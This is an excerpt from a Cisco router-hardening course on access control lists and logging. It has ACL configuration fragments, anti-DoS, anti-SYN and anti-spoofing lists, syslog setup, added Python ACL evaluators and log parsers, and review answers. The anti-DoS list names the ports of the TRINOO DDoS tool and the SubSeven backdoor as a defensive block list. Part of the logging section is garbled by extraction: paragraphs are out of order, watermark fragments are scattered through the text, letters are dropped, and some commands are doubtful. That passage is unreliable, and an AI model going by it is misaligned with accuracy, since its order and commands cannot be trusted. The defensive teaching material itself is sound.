Router(config-if)#^Z
Router#

Because a standard list can only look at the source address, the same list is applied outbound on both Ethernet interfaces: traffic sourced from either network is dropped before it can be delivered to the other, while both networks can still reach the Internet through Serial 0, which carries no such list.

Granting Telnet from One Specific Host

Our fourth example limits permission to telnet to the Internet to given hosts and denies the rest of the network from telnetting to the Internet. This requires an extended ACL, due to the need to control access to individual ports. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 123 permit tcp 192.168.20.16 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit tcp 192.168.10.7 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 deny tcp 192.168.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 out
Router(config-if)#^Z
Router#

For the fifth line, permit ip any any could be used to shorten the syntax. Note the order: the two host permits must come before the network deny, or the deny would match first and the two hosts would never be reached.

Granting FTP to a Subnet

Our fifth example grants one subnet the ability to FTP to the Internet while denying the other subnet. Again, this requires an extended ACL, due to the need to control access to individual ports. The configuration fragment for this example is:

Router#configure terminal
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 145 out
Router(config-if)#^Z
Router#

Port 21 is the FTP control connection and port 20 the active-mode data port. Passive-mode FTP carries data on a high port chosen by the server, which these lines do not cover.

Defending Against Attacks with ACLs

ACLs can be used for much more than simply granting or denying access to a service or utility. They can be used to guard against known attacks on the network, such as SYN and DoS attacks. This is possible because many tools use known and identifiable patterns in their attacks.

Anti-DoS ACLs

These ACLs work by recognizing the protocol and port selection of the DoS tool. It is possible that by using these ACLs you may block legitimate applications that happen to use the same high port values, so that must be taken into account. In order to prevent hosts inside the network from participating in a DoS on an Internet host, you should consider placing these on all interfaces, in both directions. At a minimum, place these lists inbound on the interfaces that are connected to the Internet.

In the configuration fragment that follows, the first section (ports 27665, 31335, 27444) is designed to block the TRINOO DDoS tool's handler and agent traffic, and the second section (ports 6776, 6669, 2222, 7000) is designed to block the SubSeven backdoor.

Router(config)#access-list 160 deny tcp any any eq 27665
Router(config)#access-list 160 deny udp any any eq 31335
Router(config)#access-list 160 deny udp any any eq 27444
Router(config)#access-list 160 deny tcp any any eq 6776
Router(config)#access-list 160 deny tcp any any eq 6669
Router(config)#access-list 160 deny tcp any any eq 2222
Router(config)#access-list 160 deny tcp any any eq 7000

As shown, list 160 contains only deny statements. Because of the implicit deny at the end of every list, the permit statements for the traffic you do want (at least permit ip any any) must follow these lines before the list is applied to an interface, or it will block everything.

Anti-SYN ACLs

The TCP SYN attack is one in which the attacker floods the target host with connection requests and prevents legitimate connections from being made to the target host. To work on blocking this, the ACL must allow legitimate TCP connections that are created by hosts inside the network, but disallow connections to those hosts from outside (such as from the Internet).

In this configuration fragment, the return traffic of connections established from inside is allowed back in, and incoming packets are not able to create new sessions.

Router#configure terminal
Router(config)#access-list 170 permit tcp any 192.168.20.0 0.0.0.255 established
Router(config)#access-list 170 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 170 in
Router(config-if)#^Z
Router#

The established keyword matches TCP segments with the ACK or RST bit set, which the first SYN of a connection does not have. The router does not track sessions (recall the definition of a packet filter), so an attacker can still send packets with the ACK bit set; this list stops SYN floods and new inbound connections, not everything. Note also that, as written, it denies all non-TCP traffic inbound on Serial 0, including ICMP and UDP replies, and any services the internal network is meant to offer; permits for those must be added above the final deny.
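To check lists like those in Topic 5E and this section without a router, the following Python evaluator, added here as an example and not part of the course material, parses numbered IP access-list statements in the syntax used above and walks them top down with the implicit deny at the end. It understands any, host, address plus wildcard, eq/gt/lt/neq, established and log/log-input; it is not a full IOS parser, and the packets it checks are constructed. The list text embedded in it is the page's lists 23, 123 and 170 together with the corrected anti-spoofing list 130 from the end of this section.

```python
import re
from collections import namedtuple

# Added example, not course code: evaluate numbered IP access lists the way the
# router does (top down, first match wins, implicit deny at the end). Supports
# any | host A | A W, eq/gt/lt/neq N, established, log/log-input. Constructed packets.
Packet = namedtuple("Packet", "proto src dst sport dport ack", defaults=(0, 0, False))
ANY = (0, 0xFFFFFFFF)                      # 0.0.0.0 with wildcard 255.255.255.255
DOTTED = re.compile(r"^\d+\.\d+\.\d+\.\d+$")

def ip_int(dotted):
    return int.from_bytes(bytes(int(o) for o in dotted.split(".")), "big")

def addr_matches(addr, spec):
    """Bits where the wildcard is 0 must agree with the network; 1 bits are ignored."""
    net, wild = spec
    return (addr ^ net) & ~wild & 0xFFFFFFFF == 0

def take_addr(tokens):
    """Consume 'any' | 'host A' | 'A W' | 'A' (bare address = wildcard 0.0.0.0)."""
    t = tokens.pop(0)
    if t == "any":
        return ANY
    if t == "host":
        return (ip_int(tokens.pop(0)), 0)
    wild = ip_int(tokens.pop(0)) if tokens and DOTTED.match(tokens[0]) else 0
    return (ip_int(t), wild)

def take_port(tokens):
    """Consume an optional 'eq|gt|lt|neq N' port test."""
    if tokens and tokens[0] in ("eq", "gt", "lt", "neq"):
        return (tokens.pop(0), int(tokens.pop(0)))
    return None

def port_ok(test, port):
    if test is None:
        return True
    op, n = test
    return {"eq": port == n, "gt": port > n, "lt": port < n, "neq": port != n}[op]

def parse_acls(text):
    """Parse 'access-list N permit|deny ...' lines; a leading Router(config)# prompt is ignored."""
    acls = {}
    for raw in text.splitlines():
        m = re.match(r"^(?:Router\(config\)#)?access-list (\d+) (permit|deny) (.+)$", raw.strip())
        if not m:
            continue
        number, action, tokens = int(m.group(1)), m.group(2), m.group(3).split()
        if 1 <= number <= 99:          # standard list: source address only, whole IP stack
            entry = {"proto": "ip", "src": take_addr(tokens), "sport": None,
                     "dst": ANY, "dport": None, "established": False}
        elif 100 <= number <= 199:     # extended list: protocol, both addresses, ports
            entry = {"proto": tokens.pop(0)}
            entry["src"], entry["sport"] = take_addr(tokens), take_port(tokens)
            entry["dst"], entry["dport"] = take_addr(tokens), take_port(tokens)
            entry["established"] = "established" in tokens
        else:
            raise ValueError("unsupported list number %d" % number)
        entry["action"], entry["log"] = action, bool({"log", "log-input"} & set(tokens))
        acls.setdefault(number, []).append(entry)
    return acls

def evaluate(entries, pkt):
    """Return (action, index of the matching statement); index None means the implicit deny."""
    for i, e in enumerate(entries):
        if e["proto"] not in ("ip", pkt.proto):
            continue
        if not (addr_matches(ip_int(pkt.src), e["src"]) and addr_matches(ip_int(pkt.dst), e["dst"])):
            continue
        if e["proto"] in ("tcp", "udp") and not (port_ok(e["sport"], pkt.sport) and port_ok(e["dport"], pkt.dport)):
            continue
        if e["established"] and not pkt.ack:   # established = ACK or RST bit set
            continue
        return e["action"], i
    return "deny", None

def decide(text, number, pkt):
    return evaluate(parse_acls(text)[number], pkt)

# The page's lists 23, 123 and 170, plus the corrected anti-spoofing list 130.
LISTS = """
access-list 23 deny 192.168.10.7 0.0.0.0
access-list 23 permit 0.0.0.0 255.255.255.255
access-list 123 permit tcp 192.168.20.16 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
access-list 123 permit tcp 192.168.10.7 0.0.0.0 0.0.0.0 255.255.255.255 eq 23
access-list 123 deny tcp 192.168.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 23
access-list 123 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255
access-list 170 permit tcp any 192.168.20.0 0.0.0.255 established
access-list 170 deny ip any any
access-list 130 deny ip 152.148.10.0 0.0.0.255 any
access-list 130 deny ip 127.0.0.0 0.255.255.255 any
access-list 130 deny ip 0.0.0.0 0.255.255.255 any
access-list 130 deny ip 10.0.0.0 0.255.255.255 any
access-list 130 deny ip 172.16.0.0 0.15.255.255 any
access-list 130 deny ip 192.168.0.0 0.0.255.255 any
access-list 130 deny ip host 255.255.255.255 any
access-list 130 permit ip any 152.148.10.0 0.0.0.255
"""
```

decide(LISTS, 130, Packet("ip", "172.20.1.1", "152.148.10.1")) returns ("deny", 4). Change the 172.16.0.0 wildcard to 0.0.240.255 and the same packet is permitted at statement 7, and change the third statement to 0.0.0.0 255.255.255.255 and every packet is denied at statement 2; these are the kinds of mistake the evaluator is meant to surface before a list reaches an interface.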

Anti-Land ACLs

Another type of attack that has been around for some time is the Land attack. The Land attack is rather simple in design, but it can cause serious damage to unprotected systems. It works by sending a packet whose source IP address and port are the same as its destination IP address and port. So, a packet would be sent from 10.10.10.10:5700 to 10.10.10.10:5700, causing a significant slowdown or DoS of the target.

The following configuration fragment shows the defense against a Land attack on host 10.20.30.50, which is the IP address of an external interface on the router.

Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip address 10.20.30.50 255.255.255.0
Router(config-if)#exit
Router(config)#access-list 110 deny ip host 10.20.30.50 host 10.20.30.50 log
Router(config)#access-list 110 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 110 in
Router(config-if)#^Z
Router#

A packet arriving from outside with the router's own interface address as its source is spoofed by definition, so the anti-spoofing list below would also catch it; the dedicated statement has the advantage of logging the event on its own.

Anti-spoofing ACLs

Spoofing of packets has become more commonplace due to the increased number of tools that provide this function. You can use your router to combat this issue by not allowing packets to enter the network from outside if they claim to come from an internal IP address.

When you create these lists, you want them to be complete. In other words, do not forget to block the broadcast addresses (to prevent attacks like the Smurf attack), the network addresses themselves, and private or reserved addresses. In the following configuration fragment, the internal network is 152.148.10.0/24, and you will see that quite a few lines are necessary to provide full spoof protection:

Router#configure terminal
Router(config)#access-list 130 deny ip 152.148.10.0 0.0.0.255 any
Router(config)#access-list 130 deny ip 127.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 0.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 10.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 172.16.0.0 0.15.255.255 any
Router(config)#access-list 130 deny ip 192.168.0.0 0.0.255.255 any
Router(config)#access-list 130 deny ip host 255.255.255.255 any
Router(config)#access-list 130 permit ip any 152.148.10.0 0.0.0.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 130 in
Router(config-if)#^Z
Router#

Two wildcard masks in this list deserve care. The statement for the 0.0.0.0 network must use the wildcard 0.255.255.255 (the 0.0.0.0/8 block); 0.0.0.0 with the wildcard 255.255.255.255 means any and would deny all traffic at the third line. Likewise, the private block 172.16.0.0/12 needs the wildcard 0.15.255.255; a mask such as 0.0.240.255 checks the second octet exactly and therefore catches only 172.16.x.x, letting 172.17.0.0 through 172.31.255.255 pass. The last line permits only traffic destined for the internal network; anything else arriving on Serial 0 falls to the implicit deny.

TASK 5E-1
Creating Access Control Lists

1. Setup: Use the network as diagrammed in Figure 5-16 for this task.

Create the configuration fragment that you would use to create an Access Control List to prevent a SYN attack coming from the Internet into the private networks.

Router#configure terminal
Router(config)#access-list 135 permit tcp any 192.168.20.0 0.0.0.255 established
Router(config)#access-list 135 permit tcp any 192.168.10.0 0.0.0.255 established
Router(config)#access-list 135 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 135 in
Router(config-if)#^Z
Router#

Topic 5F
Logging Concepts

Although it does not get the credit or generate a high level of interest, logging on the router is a critical aspect of router hardening. Logs enable you to investigate attacks, find problems in the network, and analyze the network. When you are configuring the logging options on a router, just as with logging elsewhere in the network, you must walk a fine line between gathering too much and too little information. Log too much, and you will have a difficult time finding the single piece of critical information you need to make a decision or perform an action. Log too little, and you do not have enough information to make an informed decision or take proper action.
There are many different kinds of logging applications and software products that can track and record logs from all over the network. These applications can then send messages to a pager or cell phone when significant events happen. In this section, you will look at just the options that the router itself can manage, without using any major third-party applications.

Cisco Logging Options

On a Cisco router, the device can log information using several different methods:
Console Logging: Log messages are sent to the console port directly.
Terminal Logging: Log messages are sent to the VTY sessions.
Buffered Logging: Log messages are kept in RAM on the router. Once the buffer fills, the oldest messages are overwritten by newer messages.
Syslog Logging: Log messages are sent to an external syslog server, which stores and sorts the messages there.
SNMP Logging: Log messages are sent (as SNMP traps) to an SNMP management station on the network.

Log Priority

The router has a built-in priority scheme for log messages. The levels range from 0 to 7. The lower the number, the more critical the message. So, Level 1 is more critical than Level 6. The following table lists the levels, along with their titles and descriptions.

Level  Title          Description
0      Emergencies    System is (or is becoming) unusable.
1      Alerts         Immediate action is needed.
2      Critical       A critical condition has occurred.
3      Errors         An error condition has occurred.
4      Warnings       A warning condition has occurred.
5      Notifications  Normal, but noteworthy event.
6      Informational  Informative message.
7      Debugging      Debugging message.

When you select a level, that level and all others with a lower number will be displayed. For example, if you select level 3, you will be presented with messages from level 3 to 0. If you select level 7, you will be presented with messages from level 7 to 0.

The following table lists an example event for each level of severity.

Level  Example
0      The IOS was unable to initialize.
1      The core router temperature is too high.
2      A problem in assigning memory occurred.
3      The memory size allocated is invalid.
4      A cryptography operation is unable to complete.
5      An interface changed state to up or down. (This is a very common event.)
6      A packet has been denied by an Access Control List.
7      No event triggers this level; debug messages are displayed only when the debug option is used.

An example of what a log line looks like on the router is:

%SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)

In this line, %SYS-5-CONFIG_I indicates a message from the SYS facility at Level 5 with the mnemonic CONFIG_I; the facility-level-mnemonic triple is the field to key on when filtering. Following the colon is the message text itself. In this case, the router had a configuration change made via a VTY session from IP address 172.16.10.1.

Configuring Logging

In the following examples, you will see how to configure different forms of logging. Some use the buffer, others the console. Viewing the configuration fragments throughout this section will enable you to determine which type of logging you will use in given situations. On the Cisco router, the command to enable logging is entered in Global Configuration Mode, using the logging on command.

When you are configuring logging in IOS 11.3 and earlier versions, the command must include the name of the level, such as alerts. In IOS 12.0 and newer versions, you can use either the name of the level or its number.

Timestamping

In order to analyze logs properly, you need to know what happened when, not just that something happened. Stamping each event with the time it occurred is an option in the router. The Cisco command to configure timestamps on log messages is service timestamps log datetime. There are three options that can be added to this command. The msec option includes milliseconds in a log entry; this may or may not be required, based on your goals. If it is not added, the entry is stamped to the nearest full second. The localtime option makes the router stamp the logs using the local time zone rather than UTC, so that they are easier for people to read and analyze; when a syslog server collects from many sites this option is often left off, so that all entries share one time base. The show-timezone option adds the time zone name to the log message, which is useful when working with log files from many locations and regions. A timestamp is only as good as the router's clock, which is the main reason to keep NTP running where logs matter.

Console Logging

Console logging is perhaps the most straightforward of all the logging options in the Cisco router. The following configuration fragment shows logging set to level 5 and to use the console as the method.

Router#configure terminal
Router(config)#logging on
Router(config)#logging console notifications
Router(config)#^Z
Router#

In this example, level 5 logging has been configured. This means that level 6 items, such as access list denials, will not be logged to the console, nor will any debug messages. Had the goal been to see only those messages that are level 2 or more critical, the command would have been logging console critical.
Buffered Logging
Buffered logging requires you to dene the memory size that will be used for the logs. The general formula that many follow is that if the router has less than 16 MB of RAM, your log can be 16 kilobytes. If your router has more than 16 MB of RAM, then your log can go as high as 32 or even 64 KB. On all logs, the time and date can be added to the messages, which is a recommended procedure. On buffered logging, however, it goes from a recommended to a required procedure. This is due to the fact that the router discards old messages and replaces them with new messages, when the buffer space is lled. So, the time of the log is a critical component to buffered logging. The following conguration fragment shows logging set to level 2, and using a timestamp.
Router#configure terminal Router(config)#logging on Router(config)#logging buffered 16000 critical Router(config)#service timestamp log date msec localtime show-timezone Router(config)#^Z Router#

In this example, the amount of memory that has been allocated is 16 KB. The logs will go to the buffer and will be recorded if they are level 2 (Critical) or higher. Finally, full timestamping is used, including the local time and the time zone options.

Ed
T DU

Terminal Logging

or
DO NO

In

372

Hardening The Infrastructure (SCP)

st

ru ct
Syslog Logging

Router#configure terminal Router(config)#logging on Router(config)#logging monitor 5 Router(config)#^Z Router#terminal monitor Router#

In this example, the terminal session will receive all level 5 and higher messages. This is the rst example that uses the numeric value of the level instead of the name, an indicator that the router must be at least IOS version 12.0. There is a second part for terminal logging. The above fragment will tell the router to log messages to the VTY sessions, but the VTY sessions have not been congured to see the messages. The terminal monitor command enables the VTY session to actually view the messages on screen. In the event that the logs become to numerous or are no longer needed, the terminal no monitor command can be used to stop viewing the logs on the VTY session.

Cisco routers have the ability to send their log messages to a server that is running as a syslog server. This is a highly recommended method of logging in a production environment. Routers collect the log messages, just as they normally do. However, instead of showing them on the console, or storing them in memory, they are sent to a server that will manage the messages and store them to the servers hard drive.

PL

IC

Normally, there are no messages sent to terminal sessions. This is for bandwidth purposes and, in some situations, security purposes. In order to allow logging to be visible on a VTY session, the terminal monitor command must be used. The following conguration fragment shows logging set to level 5, and to be sent to the VTY sessions.

AT

iti

on

This will allow for long-term storage and analysis of the information and will not be subject to real time analysis or memory constraints. Most UNIX and Linux servers have some version of the syslog server function, and there are many syslog applications for Windows systems on the market. To congure syslog logging on a Cisco router, there are four components: The destination host is any host that can be located using a host name, DNS name, or an IP address.

The syslog facility is the name to use to congure the storage of the messages on the syslog server. Although there are quite a few facility names, the routers will use the ones named Local0 through Local7. The severity level of the logs can be viewed as similar to that of the other log messages, using the Cisco severity levels. The source interface for the messages is the actual network interface that will send the messages to the Syslog server.

ru ct

TASK 5F-1
1.

Configuring Buffered Logging

st

Create the conguration fragment you would use for buffered logging, using 32 kilobytes of memory. Include all timestamping options and log level 4 events. Assume that the router is running IOS version 12.2.
Router#configure terminal Router(config)#logging on Router(config)#logging buffered 32000 4 Router(config)#service timestamp log date msec localtime show-timezone Router(config)#^Z Router#

Lesson 5: Routers and Access Control Lists 373

The following configuration fragment shows the setup of a router to use a syslog server.

Router#configure terminal
Router(config)#logging on
Router(config)#logging trap 5
Router(config)#logging 10.20.30.45
Router(config)#logging facility Local5
Router(config)#logging source-interface Ethernet 0
Router(config)#^Z
Router#

In this example, logging has been enabled. Logging is going to be sent to a syslog server, logging messages that are level 5 or more critical. The IP address of the syslog server is 10.20.30.45. (Additional servers can be used with multiple commands using different IP addresses here, for redundancy.) The facility on the syslog server is Local5, and the source for these messages is Ethernet 0 on the router.
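To see how the facility and severity chosen above arrive at the syslog server, the following added example (not part of the course material) decodes the syslog PRI header, which packs facility and severity into one number, and files messages the way a server-side selector such as local5.notifications would. The sample datagrams are constructed; exact message text varies by IOS release.

```python
"""Classify syslog datagrams the way a syslog server would file messages
sent by the router configuration above (logging facility Local5,
logging trap 5). Added example, not course code; the sample lines are
constructed and exact message text varies by IOS release."""
import re
from dataclasses import dataclass
from typing import Dict, List

# RFC 3164 facility codes; Cisco IOS only uses local0..local7 (16..23).
FACILITY_CODES: Dict[str, int] = {f"local{i}": 16 + i for i in range(8)}
# Cisco severity levels, index = numeric level (0 is most critical).
SEVERITY_NAMES = ["emergencies", "alerts", "critical", "errors",
                  "warnings", "notifications", "informational", "debugging"]

_PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.DOTALL)


@dataclass
class SyslogMessage:
    facility: int   # numeric facility code, e.g. 21 for local5
    severity: int   # 0..7
    body: str       # everything after the <PRI> header


def encode_pri(facility_name: str, severity: int) -> int:
    """PRI = facility * 8 + severity; Local5 at level 5 yields <173>."""
    if not 0 <= severity <= 7:
        raise ValueError("severity must be 0..7")
    return FACILITY_CODES[facility_name.lower()] * 8 + severity


def parse_syslog(line: str) -> SyslogMessage:
    """Split the <PRI> header off a raw syslog line and decode it."""
    m = _PRI_RE.match(line)
    if m is None:
        raise ValueError(f"no <PRI> header: {line!r}")
    pri = int(m.group(1))
    if pri > 191:  # local7 (23) * 8 + debugging (7) is the largest legal PRI
        raise ValueError(f"PRI out of range: {pri}")
    return SyslogMessage(facility=pri // 8, severity=pri % 8,
                         body=m.group(2).strip())


def matches_selector(msg: SyslogMessage, selector: str) -> bool:
    """syslog.conf-style selector such as 'local5.notifications': the named
    facility at that severity or anything more critical (numerically lower)."""
    fac, _, level = selector.partition(".")
    return (msg.facility == FACILITY_CODES[fac.lower()]
            and msg.severity <= SEVERITY_NAMES.index(level))


def file_by_severity(lines: List[str], selector: str) -> Dict[str, List[str]]:
    """Keep the lines a server configured with `selector` would store,
    bucketed by Cisco severity name. Lines without a PRI header are skipped."""
    buckets: Dict[str, List[str]] = {}
    for line in lines:
        try:
            msg = parse_syslog(line)
        except ValueError:
            continue
        if matches_selector(msg, selector):
            buckets.setdefault(SEVERITY_NAMES[msg.severity], []).append(msg.body)
    return buckets


# Constructed datagrams as the router above might emit them (<173> = local5.5).
SAMPLE_LINES = [
    "<173>14: *Mar  1 00:02:11.123: %LINK-5-CHANGED: Interface Serial0, "
    "changed state to administratively down",
    "<171>15: *Mar  1 00:02:12.001: %LINK-3-UPDOWN: Interface Serial1, "
    "changed state to down",
    "<173>16: *Mar  1 00:03:40.512: %SYS-5-CONFIG_I: Configured from console by vty0",
    # Level 6: never leaves a router set to 'logging trap 5', and a
    # local5.notifications selector would drop it on the server as well.
    "<174>17: *Mar  1 00:04:02.777: %SEC-6-IPACCESSLOGP: list 123 denied tcp "
    "172.16.9.9(4321) (Serial0 00aa.bbcc.ddee) -> 172.16.5.5(80), 1 packet",
    # Same severity but facility local6: belongs in a different file.
    "<181>18: *Mar  1 00:04:30.000: %SYS-5-CONFIG_I: Configured from console by console",
    "garbage without a header",
]

if __name__ == "__main__":
    for level, bodies in file_by_severity(SAMPLE_LINES, "local5.notifications").items():
        print(level, len(bodies))
```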

ACL Logging
The previous section on logging focused on the system log events, critical errors, and messages. Another important area to investigate is the use of logging in relationship to your Access Control Lists. When implemented, ACL logs are listed as Level 6 events. In order to implement ACL logging, the commands are very simple. All you need to add is the keyword log or log-input to the end of the ACL statements. You do not want to add this line to all your ACL statements, however, or you will flood your logs with so much information that you will be virtually unable to identify anything useful.

374 Hardening The Infrastructure (SCP)

Use of the log keyword will list the type, date, and time in the ACL log, and is a valid option only for standard ACLs on IOS version 12.0 and newer. The log-input keyword adds information on the interface and source MAC address; an example of the use of this is when the same ACL is to be applied to more than one interface.

Logging may be one reason that you do not count on the default deny all rule of an ACL. If a packet is dropped due to the default deny all statement, that packet will not be logged. If, however, you add the following line as your last statement in the ACL, then packets will be logged: access-list 123 deny ip any any log.

Anti-spoofing Logging
Earlier, you looked at the creation of anti-spoofing ACLs. In this section, you will see these ACLs used with the logging function to gather information for analysis. In these examples, assume that the internal network is 172.16.0.0/16. First, the configuration fragment of the list itself:

Router#configure terminal
Router(config)#access-list 123 deny ip 172.16.0.0 0.0.255.255 any log-input
Router(config)#access-list 123 permit ip any any
Router(config)#access-list 145 permit ip 172.16.0.0 0.0.255.255 any log-input
Router(config)#access-list 145 deny ip any any log-input
Router(config)#^Z
Router#

For the next example, assume that the router has one internal Ethernet interface (where the trusted network is located) and has two external serial interfaces. The following configuration fragment shows the application of the ACLs, first list 123 then list 145, on their proper interfaces.

Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)#ip access-group 123 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)#ip access-group 145 out
Router(config-if)#^Z
Router#

VTY Logging
When gaining access to the router, a primary method used was through VTY sessions. These sessions may come under frequent attack at larger organizations. You will want to know who is and who is not successful at gaining access via VTY sessions; again, logging is the answer to that need. In this example, you will again assume the internal network 172.16.0.0/16, and that there is only one trusted host that has authorized VTY access, 172.16.23.45. With those variables defined, the following is the configuration fragment that will log VTY sessions on the router.

Router#configure terminal
Router(config)#access-list 155 permit ip host 172.16.23.45 any log-input
Router(config)#access-list 155 deny ip any any log-input
Router(config)#^Z
Router#

Once you have created the list, as shown, you will need to apply the list. In the following configuration fragment, the list is applied to VTY sessions 0 through 4.

Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#access-class 155 in
Router(config-line)#^Z
Router#


TASK 5F-2
Configuring Anti-spoofing Logging

1. Create a logged ACL that is used for anti-spoofing, using the following information: The router has interfaces Ethernet0, Serial0, and Serial1. Ethernet0 is connected to the only trusted network, which has the IP address 192.168.45.0/24. For this exercise, and in the interest of time, only create anti-spoofing for the defined network. If you want to expand this to include all private and reserved networks, you can do so, but it is not required.

Router#configure terminal
Router(config)#access-list 160 deny ip 192.168.45.0 0.0.0.255 any log-input
Router(config)#access-list 160 permit ip any any
Router(config)#access-list 170 permit ip 192.168.45.0 0.0.0.255 any log-input
Router(config)#access-list 170 deny ip any any log-input
Router(config)#^Z
Router#

Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 1
Router(config-if)#ip access-group 160 in
Router(config-if)#exit
Router(config)#interface Serial 0
Router(config-if)#ip access-group 170 out
Router(config-if)#^Z
Router#

Summary
In this lesson, you examined the fundamentals of router security and the principles of routing. You created the configurations that are required to harden a Cisco router and configured the removal of services and protocols. You examined the process of the wildcard mask and how it relates to the Cisco ACL. You created the configurations for ACLs to defend the network against attacks. Finally, you examined the process of logging on a Cisco router and configured buffered and anti-spoofing logging.
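The anti-spoofing lists (123/145 and 160/170) and the VTY list 155 all log with log-input, so each hit carries the ingress interface and source MAC. The following added example (not part of the course material) parses those %SEC-6-IPACCESSLOG records and reports packets that arrived on an external interface claiming an internal source address; the log lines are constructed, and the exact text varies by IOS release.

```python
"""Summarize Cisco ACL log-input records (%SEC-6-IPACCESSLOG*) to spot
spoofed sources per ingress interface. Added example, not course code;
the sample lines are constructed and the exact message text varies by
IOS release."""
import ipaddress
import re
from collections import Counter
from typing import List, Optional

# Covers the port (P), ICMP (DP) and other-protocol (NP) variants. The
# "(Interface MAC)" group only appears when the ACE used log-input.
_ACL_LOG_RE = re.compile(
    r"%SEC-6-IPACCESSLOG(?:P|DP|NP): list (?P<acl>\S+) (?P<action>permitted|denied) "
    r"(?P<proto>\S+) (?P<src>\d+\.\d+\.\d+\.\d+)(?:\((?P<sport>\d+)\))? "
    r"(?:\((?P<intf>\S+) (?P<mac>[0-9a-fA-F.]+)\) )?"
    r"-> (?P<dst>\d+\.\d+\.\d+\.\d+)(?:\((?P<dport>\d+)\))?(?: \(\d+/\d+\))?"
    r", (?P<count>\d+) packets?"
)


def parse_acl_log(line: str) -> Optional[dict]:
    """Return the fields of one ACL log record, or None for any other line."""
    m = _ACL_LOG_RE.search(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["count"] = int(rec["count"])
    return rec


def denied_packets(lines: List[str]) -> Counter:
    """Denied packet totals keyed by (acl, ingress interface, source MAC, source IP).
    Interface and MAC are '?' when the ACE logged with plain 'log'."""
    totals: Counter = Counter()
    for line in lines:
        rec = parse_acl_log(line)
        if rec is None or rec["action"] != "denied":
            continue
        key = (rec["acl"], rec["intf"] or "?", rec["mac"] or "?", rec["src"])
        totals[key] += rec["count"]
    return totals


def spoof_report(lines: List[str], internal_net: str, inbound_acl: str) -> Counter:
    """Packets denied by the inbound anti-spoofing list whose claimed source is
    inside the internal network, i.e. traffic that entered on an external
    interface pretending to be internal. Keyed by (interface, MAC, source IP)."""
    net = ipaddress.ip_network(internal_net)
    report: Counter = Counter()
    for (acl, intf, mac, src), n in denied_packets(lines).items():
        if acl == inbound_acl and ipaddress.ip_address(src) in net:
            report[(intf, mac, src)] += n
    return report


# Constructed records for the 172.16.0.0/16 example above (timestamps omitted).
SAMPLE_LINES = [
    "%LINK-5-CHANGED: Interface Serial0, changed state to administratively down",
    "%SEC-6-IPACCESSLOGP: list 123 denied tcp 172.16.9.9(4321) "
    "(Serial0 00aa.bbcc.ddee) -> 172.16.5.5(80), 1 packet",
    "%SEC-6-IPACCESSLOGP: list 123 denied tcp 172.16.9.9(4322) "
    "(Serial0 00aa.bbcc.ddee) -> 172.16.5.5(443), 4 packets",
    "%SEC-6-IPACCESSLOGDP: list 123 denied icmp 172.16.1.2 "
    "(Serial1 00aa.bbcc.0001) -> 172.16.5.5 (8/0), 3 packets",
    # Outbound list 145: an internal host sending with a forged external source.
    "%SEC-6-IPACCESSLOGP: list 145 denied udp 10.0.0.5(1025) "
    "(Ethernet0 0000.0c12.3456) -> 198.51.100.7(53), 2 packets",
    # VTY list 155: the one trusted host is permitted, everything else denied.
    "%SEC-6-IPACCESSLOGP: list 155 permitted tcp 172.16.23.45(1040) "
    "(Ethernet0 0000.0c12.ab01) -> 172.16.1.1(23), 1 packet",
    "%SEC-6-IPACCESSLOGP: list 155 denied tcp 172.16.200.7(2051) "
    "(Ethernet0 0000.0c12.ab02) -> 172.16.1.1(23), 1 packet",
]

if __name__ == "__main__":
    for (intf, mac, src), n in spoof_report(SAMPLE_LINES, "172.16.0.0/16", "123").items():
        print(f"{intf} {mac} claimed {src}: {n} packets")
```

These are severity-6 records, so a router configured with logging trap 5 keeps them out of the syslog feed; raise the trap level or review the local buffer to collect them.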

Lesson Review

5A What is authentication?
Authentication is the process of identifying a user, generally granting or denying access.

What is authorization?
Authorization is the process of defining what a user can do, or is authorized to do.

What is AAA?
Authentication, Authorization, and Accounting.

What are the methods of access to a Cisco router?
Console port, Auxiliary port, VTY sessions, HTTP, TFTP, SNMP.

5B List some of the advantages of using static routing.
Responses might include: Precise control over the routes that data will take across the network. Easy to configure in small networks. Reduced bandwidth use, due to no excessive router traffic. Reduced load on the routers, due to no need to make complex routing calculations.

What is a security advantage to using RIPv2 over RIPv1?
Using RIPv2 provides the security advantage of authentication, enabling the routers to identify who is and who is not able to update routing information.

5C What is a security reason for disabling CDP?
CDP might be broadcasting information about the router that is not intended to be public knowledge.

What is an attack that you can defend against by disabling ICMP directed broadcasts?
Smurf.

5D What type of Access Control List allows for the checking of port numbers?
